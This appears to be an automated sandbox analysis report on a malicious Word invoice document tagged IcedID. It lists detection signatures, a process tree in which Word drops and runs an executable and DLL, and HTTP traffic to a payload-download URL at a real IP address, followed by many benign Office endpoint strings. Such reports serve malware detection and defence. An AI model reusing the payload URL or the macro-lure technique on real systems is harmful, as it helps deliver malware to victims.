Edit tour

Windows Analysis Report
wpswireless-invoice-08.11.22.doc

Overview

General Information

Sample Name:	wpswireless-invoice-08.11.22.doc
Analysis ID:	682568
MD5:	672ff75cfa223733b4d42382089a57b2
SHA1:	02dd6b448c2373dc1223724b1ab1aff920528aa6
SHA256:	aabc9295e27a673dcfb902960b8196a561923cef78ddb061956cb627fcfa782c
Tags:	docIcedID
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (creates forbidden files)

Office process drops PE file

Machine Learning detection for sample

Document contains an embedded VBA macro with suspicious strings

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 5352 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)

r3F3.tmp.exe (PID: 1992 cmdline: "C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe" "C:\Users\user\AppData\Local\Temp\y133.tmp.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: wpswireless-invoice-08.11.22.doc

ReversingLabs: Detection: 15%

Machine Learning detection for sample

Source: wpswireless-invoice-08.11.22.doc

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: rundll32.pdb source: r3F3.tmp.exe, r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr
Source:	Binary string: rundll32.pdbGCTL source: r3F3.tmp.exe, 00000003.00000000.285193260.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, r3F3.tmp.exe.0.dr

Software Vulnerabilities

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: r3F3.tmp.exe.0.dr

Jump to dropped file

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\y133.tmp.dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe			Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Process created: C:\Users\user\AppData\Local\Temp\r3F3.tmp.exe

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 45.8.146.139:80 -> 192.168.2.3:49741
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80
Source: global traffic	TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80

Source: global traffic

TCP traffic: 192.168.2.3:49741 -> 45.8.146.139:80

Source: winword.exe

Memory has grown: Private usage: 0MB later: 76MB

Source: Joe Sandbox View

IP Address: 45.8.146.139 45.8.146.139

Source: global traffic

HTTP traffic detected: GET /fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.8.146.139Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown	TCP traffic detected without corresponding DNS query: 45.8.146.139

Source: r3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
Source: r3F3.tmp.exe, 00000003.00000002.298547030.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmP
Source: r3F3.tmp.exe, 00000003.00000002.298513793.0000000002890000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rmYKINT86D3PPVX0ILQLA-SG/rmG/rmG/rm
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.aadrm.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.office.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://augloop.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cdn.entity.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://cr.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://directory.services.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://graph.windows.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://invites.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://login.windows.local
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://management.azure.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://management.azure.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.action.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.engagement.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://osi.office.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://otelrules.azureedge.net
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office365.com
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 63CA26CB-402D-484B-8FDD-9A1DCA3EDC07.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
